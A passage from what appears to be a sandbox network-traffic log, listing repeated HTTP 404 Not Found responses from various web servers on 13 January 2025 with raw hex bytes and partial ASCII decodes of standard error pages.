2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 13 Jan 2025 09:22:51 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 13 Jan 2025 09:22:54 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 09:24:25 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UiwR030xAQaoTw%2F9kKGb0M92qobgKG28cBVlKU9mVvdHa2KvWawnbqu2sqUNVKlsmR1biJnxBh08Pd6a10UFMHwdRa63e8Tyy7KtSBagOMwB3ZFHBaeCb46NRlql94tbUiqmpSWnDg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9014554889cf05fd-IADContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=100200&min_rtt=100200&rtt_var=50100&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=811&delivery_rate=0&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 65 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 6e c2 30 10 44 ef fe 8a 2d 77 b2 01 71 e8 61 65 a9 25 41 45 0a 34 6a cd 81 a3 c1 5b 19 89 c6 c6 de 34 e2 ef ab 04 55 ea 75 e6 cd 68 86 9e aa f7 b5 39 b6 35 bc 99 5d 03 ed e1 b5 d9 ae 61 36 47 dc d6 66 83 58 99 ea e1 2c 8b 12 b1 de cf b4 22 2f df 57 4d 9e ad d3 8a e4 22 57 d6 ab 72 05 fb 20 b0 09 7d e7 08 1f a2 22 9c 20 3a 05 77 1f 73 0b fd 8f f1 0b ad 28 6a e3 19 12 df 7a ce c2 0e 0e 1f 0d 0c 36 43 17 04 be 46 0e 42 07 e2 2f 19 32 a7 1f 4e 05 61 1c 9b 92 56 64 9d 4b 9c b3 7e 89 f6 ec 19 3e 27 00 ac c0 30 0c c5 a9 bf e7 c8 7c f6 59 8a ec 43 84 36 24 81 e7 92 f0 2f a6 08 a7 5d 84 d3 9f 5f 00 00 00 ff ff e3 02 00 2b bb 83 fa 0a 01 00 00 0d 0a Data Ascii: e3Ln0D-wqae%AE4j[4Uuh95]a6GfX,"/WM"Wr }" :ws(jz6CFB/2NaVdK~>'0\|YC6$/]_+
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 09:24:27 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I99fz95jWiJV7Eu0xHIPXp99bc%2FkeniO5LlCbbfKhh4VtfQEGnvmDlO6cDnWMNMqKRZK3i%2FPN1TT%2BwuVGQeeajuEK9xzUXM5ZUgGWRBUQfGYodXG2fD1ChDAP4GMF%2BbqhYfbXV45rg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90145558eaa1c981-IADContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=100223&min_rtt=100223&rtt_var=50111&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=831&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 6e c2 30 10 44 ef fe 8a 2d 77 b2 01 71 e8 61 65 a9 25 41 45 0a 34 6a cd 81 a3 c1 5b 19 89 c6 c6 de 34 e2 ef ab 04 55 ea 75 e6 cd 68 86 9e aa f7 b5 39 b6 35 bc 99 5d 03 ed e1 b5 d9 ae 61 36 47 dc d6 66 83 58 99 ea e1 2c 8b 12 b1 de cf b4 22 2f df 57 4d 9e ad d3 8a e4 22 57 d6 ab 72 05 fb 20 b0 09 7d e7 08 1f a2 22 9c 20 3a 05 77 1f 73 0b fd 8f f1 0b ad 28 6a e3 19 12 df 7a ce c2 0e 0e 1f 0d 0c 36 43 17 04 be 46 0e 42 07 e2 2f 19 32 a7 1f 4e 05 61 1c 9b 92 56 64 9d 4b 9c b3 7e 89 f6 ec 19 3e 27 00 ac c0 30 0c c5 a9 bf e7 c8 7c f6 59 8a ec 43 84 36 24 81 e7 92 f0 2f a6 08 a7 5d 84 d3 9f 5f 00 00 00 ff ff 0d 0a Data Ascii: d8Ln0D-wqae%AE4j[4Uuh95]a6GfX,"/WM"Wr }" :ws(jz6CFB/2NaVdK~>'0\|YC6$/]_
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 09:24:30 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FYzPujui%2BprnyflZHMifabHj%2F2vpLvrx7Q4vJNtaAvIhSaLpZpH6b8rNkalH%2FYW7S4ZUWfUK0zEyzvFxI%2BNmwMccFImV8RmCaGG%2FGZh43Kt64j00vI343o4s%2BxlI%2FiPz564nk%2FQQag%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 901455695a08c997-IADContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=99819&min_rtt=99819&rtt_var=49909&sent=7&recv=9&lost=0&retrans=0&sent_bytes=0&recv_bytes=7980&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 65 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 6e c2 30 10 44 ef fe 8a 2d 77 b2 01 71 e8 61 65 a9 25 41 45 0a 34 6a cd 81 a3 c1 5b 19 89 c6 c6 de 34 e2 ef ab 04 55 ea 75 e6 cd 68 86 9e aa f7 b5 39 b6 35 bc 99 5d 03 ed e1 b5 d9 ae 61 36 47 dc d6 66 83 58 99 ea e1 2c 8b 12 b1 de cf b4 22 2f df 57 4d 9e ad d3 8a e4 22 57 d6 ab 72 05 fb 20 b0 09 7d e7 08 1f a2 22 9c 20 3a 05 77 1f 73 0b fd 8f f1 0b ad 28 6a e3 19 12 df 7a ce c2 0e 0e 1f 0d 0c 36 43 17 04 be 46 0e 42 07 e2 2f 19 32 a7 1f 4e 05 61 1c 9b 92 56 64 9d 4b 9c b3 7e 89 f6 ec 19 3e 27 00 ac c0 30 0c c5 a9 bf e7 c8 7c f6 59 8a ec 43 84 36 24 81 e7 92 f0 2f a6 08 a7 5d 84 d3 9f 5f 00 00 00 ff ff e3 02 00 2b bb 83 fa 0a 01 00 00 0d 0a Data Ascii: e3Ln0D-wqae%AE4j[4Uuh95]a6GfX,"/WM"Wr }" :ws(jz6CFB/2NaVdK~>'0\|YC6$/]_+
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 09:24:33 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t%2FJR4NEX%2BBDVwSp79bAva6A4yhlb%2F7kr3JXhU5P3v49M5r%2F8nMisdDrApsYWnM97VkUonDAlO0QxMDMPyW87Td53Kf6cKXTUrrCIecd8C2idODNazY1xmYr0dqIjkPTWDCyRJCa80w%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90145579bd1ec997-IADalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=100333&min_rtt=100333&rtt_var=50166&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=534&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 13 Jan 2025 09:24:39 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 13 Jan 2025 09:24:42 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 13 Jan 2025 09:24:45 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 09:25:15 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p%2FXltDMkuoCm2cVuCDun%2BG4bFcmINpqPl%2BYtZs7P2C5qmi8GLi79zQaLpvehh2jY61KglRivv0sDHIX1xL6LdelJEo3GNziqtv0qFo5%2F6%2Fb2LmL6ryc66qmYfnAxHnwRTjGZ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90145680c9f90634-IADContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=100007&min_rtt=100007&rtt_var=50003&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=799&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a3
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 09:25:18 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3Q2H1Hr9tEbtaMMrO%2F5vuZhEcXbhNNiZC%2FiHH3hWUyojhIX822lJcloTQV32qwOeeEN825Hs2BXe9UIqBT1iWQFcY%2FsBVW%2BboSDDV1c0IH6pd9ZA1iTametqoVtDcbuuxx06"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 901456912c3a82b1-IADContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=99848&min_rtt=99848&rtt_var=49924&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=819&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a3
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 09:25:20 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ogfCg2yV%2FMqeaqtshNonBI7aLsQIzkbbmoktSvgYDY7JFDnaPcN6fAqvXF5ULN62xjw56pGwEkGHukNNCg%2FH41pVt9pr8M%2FnusqQIYfqgM61GOsdEKI8GIAb%2BoWY678RivYI"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 901456a1982c578a-IADContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=99840&min_rtt=99840&rtt_var=49920&sent=7&recv=9&lost=0&retrans=0&sent_bytes=0&recv_bytes=7968&delivery_rate=0&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a3
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 09:25:23 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WwQek7EDeSIghLDut3C%2BlKBmE5mVH0Q%2FINxGx%2FXVUqqdJ7VaXLogweFVPqZlznEPe6axTZrpBDvgzPnLN%2BVQ33Prsy3W9A8wcaHmgplxRXhNoFSQ7jJbMTe5Hc7e7CDD6SoP"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 901456b1f92182b1-IADalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=99881&min_rtt=99881&rtt_var=49940&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=530&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 09:25:28 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 